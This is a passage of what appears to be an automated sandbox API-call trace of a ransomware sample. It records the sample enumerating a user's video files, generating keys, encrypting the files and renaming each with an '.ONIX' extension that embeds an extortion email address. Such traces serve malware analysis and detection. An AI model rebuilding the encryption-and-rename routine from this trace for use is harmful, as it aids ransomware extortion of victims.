hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.782] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2a5fdf0, ftCreationTime.dwHighDateTime=0x1d5de13, ftLastAccessTime.dwLowDateTime=0x53478470, ftLastAccessTime.dwHighDateTime=0x1d5e66c, ftLastWriteTime.dwLowDateTime=0x53478470, ftLastWriteTime.dwHighDateTime=0x1d5e66c, nFileSizeHigh=0x0, nFileSizeLow=0x1090f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kx115AH8rkET.mkv", cAlternateFileName="KX115A~1.MKV")) returned 1 [0121.782] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kx115ah8rket.mkv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.782] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.782] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1090f, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.782] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.782] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.783] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.783] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.783] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.783] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.783] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv", dwFileAttributes=0x80) returned 1 [0121.783] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv") returned 54 [0121.783] GetProcessHeap () returned 0x410000 [0121.783] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdc) returned 0x44faf8 [0121.783] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv" [0121.783] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.783] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=67855) returned 1 [0121.783] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1090f [0121.784] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.784] GetProcessHeap () returned 0x410000 [0121.784] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.784] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.785] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.787] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.788] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.789] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1090f) returned 0xf50048 [0121.790] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1090f) returned 0xf60960 [0121.790] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.790] ReadFile (in: hFile=0x4c8, lpBuffer=0xf50048, nNumberOfBytesToRead=0x1090f, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesRead=0x367f44c*=0x1090f, lpOverlapped=0x0) returned 1 [0121.793] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1090f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.793] CloseHandle (hObject=0x4c8) returned 1 [0121.794] GetProcessHeap () returned 0x410000 [0121.794] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.794] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kx115ah8rket.mkv"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\kx115AH8rkET.mkv.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\kx115ah8rket.mkv.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.796] GetProcessHeap () returned 0x410000 [0121.796] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.796] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x937c4d50, ftCreationTime.dwHighDateTime=0x1d5d7e4, ftLastAccessTime.dwLowDateTime=0xdd588db0, ftLastAccessTime.dwHighDateTime=0x1d5d827, ftLastWriteTime.dwLowDateTime=0xdd588db0, ftLastWriteTime.dwHighDateTime=0x1d5d827, nFileSizeHigh=0x0, nFileSizeLow=0x9e20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LH7J.avi", cAlternateFileName="")) returned 1 [0121.796] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lh7j.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.796] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.796] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9e20, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.796] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.796] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.797] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.797] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.797] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.797] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.797] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi", dwFileAttributes=0x80) returned 1 [0121.797] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi") returned 46 [0121.797] GetProcessHeap () returned 0x410000 [0121.797] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xcc) returned 0x477600 [0121.797] lstrcpyW (in: lpString1=0x477600, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi" [0121.797] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.797] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=40480) returned 1 [0121.798] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x9e20 [0121.798] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.798] GetProcessHeap () returned 0x410000 [0121.798] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.798] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.799] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.800] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.801] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.804] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9e20) returned 0x4dcb68 [0121.804] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x9e20) returned 0xf50048 [0121.805] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.805] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0x9e20, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0x9e20, lpOverlapped=0x0) returned 1 [0121.807] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9e20, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.807] CloseHandle (hObject=0x4c8) returned 1 [0121.808] GetProcessHeap () returned 0x410000 [0121.808] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.808] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lh7j.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\LH7J.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lh7j.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.810] GetProcessHeap () returned 0x410000 [0121.810] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x477600 | out: hHeap=0x410000) returned 1 [0121.810] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4543450, ftCreationTime.dwHighDateTime=0x1d5dba8, ftLastAccessTime.dwLowDateTime=0xaddc28f0, ftLastAccessTime.dwHighDateTime=0x1d5e0ef, ftLastWriteTime.dwLowDateTime=0xaddc28f0, ftLastWriteTime.dwHighDateTime=0x1d5e0ef, nFileSizeHigh=0x0, nFileSizeLow=0xdb8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mfN7DXrwsNcQe1fW5rAE.avi", cAlternateFileName="MFN7DX~1.AVI")) returned 1 [0121.810] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mfn7dxrwsncqe1fw5rae.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.810] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.810] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xdb8, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.810] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.810] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.811] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.811] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.811] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.811] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.811] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi", dwFileAttributes=0x80) returned 1 [0121.811] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi") returned 62 [0121.811] GetProcessHeap () returned 0x410000 [0121.811] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xec) returned 0x44faf8 [0121.812] lstrcpyW (in: lpString1=0x44faf8, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi" [0121.812] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.812] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=3512) returned 1 [0121.812] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xdb8 [0121.812] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.812] GetProcessHeap () returned 0x410000 [0121.812] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.812] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.813] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.814] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.815] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdb8) returned 0x4dcb68 [0121.816] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xdb8) returned 0x4dd928 [0121.817] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.817] ReadFile (in: hFile=0x4c8, lpBuffer=0x4dcb68, nNumberOfBytesToRead=0xdb8, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dcb68*, lpNumberOfBytesRead=0x367f44c*=0xdb8, lpOverlapped=0x0) returned 1 [0121.817] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=-3512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.817] WriteFile (in: hFile=0x4c8, lpBuffer=0x4dd928*, nNumberOfBytesToWrite=0xdb8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4dd928*, lpNumberOfBytesWritten=0x367f44c*=0xdb8, lpOverlapped=0x0) returned 1 [0121.818] UnlockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xdb8, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0121.818] CloseHandle (hObject=0x4c8) returned 1 [0121.819] GetProcessHeap () returned 0x410000 [0121.819] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8e98 | out: hHeap=0x410000) returned 1 [0121.819] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mfn7dxrwsncqe1fw5rae.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mfN7DXrwsNcQe1fW5rAE.avi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mfn7dxrwsncqe1fw5rae.avi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0121.821] GetProcessHeap () returned 0x410000 [0121.821] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44faf8 | out: hHeap=0x410000) returned 1 [0121.821] FindNextFileW (in: hFindFile=0x48eff0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x426b2fd0, ftCreationTime.dwHighDateTime=0x1d5dc21, ftLastAccessTime.dwLowDateTime=0x39924fb0, ftLastAccessTime.dwHighDateTime=0x1d5e680, ftLastWriteTime.dwLowDateTime=0x39924fb0, ftLastWriteTime.dwHighDateTime=0x1d5e680, nFileSizeHigh=0x0, nFileSizeLow=0xaa8a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mvNITyeIYPrbnztH.swf", cAlternateFileName="MVNITY~1.SWF")) returned 1 [0121.821] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\mvnityeiyprbnzth.swf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x4c8 [0121.821] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0121.822] LockFile (hFile=0x4c8, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xaa8a, nNumberOfBytesToLockHigh=0x0) returned 1 [0121.822] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0121.822] ReadFile (in: hFile=0x4c8, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0121.822] SetFilePointerEx (in: hFile=0x4c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0121.822] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.823] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x4d8d90 | out: pbBuffer=0x4d8d90) returned 1 [0121.823] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b27a0 | out: pbBuffer=0x4b27a0) returned 1 [0121.823] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf", dwFileAttributes=0x80) returned 1 [0121.823] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf") returned 58 [0121.823] GetProcessHeap () returned 0x410000 [0121.823] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xe4) returned 0x467908 [0121.823] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf" [0121.823] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\mvNITyeIYPrbnztH.swf.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0121.823] GetFileSizeEx (in: hFile=0x4c8, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=43658) returned 1 [0121.823] SetFilePointer (in: hFile=0x4c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xaa8a [0121.823] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0121.823] GetProcessHeap () returned 0x410000 [0121.823] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d8e98 [0121.823] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d8e98*, pdwDataLen=0x367f414*=0x100) returned 1 [0121.823] WriteFile (in: hFile=0x4c8, lpBuffer=0x4d8e98*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8e98*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0121.825] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0121.826] WriteFile (in: hFile=0x4c8, lpBuffer=0x4b27a0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b27a0*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0121.827] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xaa8a) returned 0x4dcb68 